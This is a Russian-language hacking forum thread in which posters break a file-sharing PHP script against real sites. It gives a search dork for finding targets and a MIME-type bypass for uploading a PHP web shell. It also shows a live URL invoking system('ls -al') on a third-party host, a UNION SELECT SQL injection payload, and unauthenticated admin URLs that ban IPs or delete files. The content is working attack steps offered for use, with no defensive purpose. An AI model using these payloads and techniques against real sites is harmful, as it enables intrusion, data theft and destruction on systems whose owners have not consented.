|
Тестил вот этот, зануленый
http://www.nulled.ws/attachment.php?attachmentid=15074&d=1225918711 Реги там нет, сам невижу что там, мне emillord дал ссыль на свой обменик, я захекал Заливаем .php файл с phpinfo() и скачиваем, предлагает сохранить, но там будет результат Если скрипт ругается, что недопустимый тип: Скрипт берёт mime type из массива $_FILES а там mime type берётся из вашего запроса к серверу, сниффаем, меняем Content-Type: ocet/stream (или чего оно там у вас) на Content-Type: text/plain пых файл заливается, запускается... всё исходники вам показать немогу, лень и нет у меня их, нет реги на нулледе, но emillord сказал он тама качал ну как-то так... =========== дорк inurl:view-file.html?file= первая ссылка - ломаеца как задумывалось токо я из phpinfo взял прямой путь, вот http://www.sharefile.org/storage/1iecwexb3ibhfsc2ubceacg7zwitr5.php?c=echo%20'%3Cpr e%3E';system('ls%20-al');%20exit; какой-то школьник снёс |
Ну вон оно
process-multi-upload.php какая-то там строка $contenttype = $_FILES['Filedata']['type']; Тама ещё по ходу и скуля.... view-file.html PHP код:
Любопытство сильнее лени view-file.html?file=-1%20UNION%20SELECT%20null,null,null,null,null,conc at_ws(0x3a,version(),database(),user()),null,null, null%23 Код:
Code:Код:
Code:А ещё там есть проверка на $_SESSION[sess_isadmin] == 'yes' через соседей если подменим сессию, будем одминами... Но нафиг надо А ещё при register_globals в footer.php XSS $site_url,$site_name,$theme_path(нет, не инклуд... по крайней мере не в этом файле) Всё, я срочно убежал гамать таки вернулся... admin-ban-ip.html нет проверки на админство... ну он где-то есть, но я не стал искать, в скрипт сначала делает, потом проверяет Ну короче admin-ban-ip.html?banipsubmit=1&banip=1.1.1.1 - забаним ip 1.1.1.1 будет редирект, но IP Добавится открыл следующий файл - скуля... и удаление файлов admin-home.html?d={SQL или ID файла} - удалит ID и SQL Inj не, это уже извращенство, смысла щупать нет, там всё дырявое |
Тема спущена с РОА
|
| Время: 15:39 |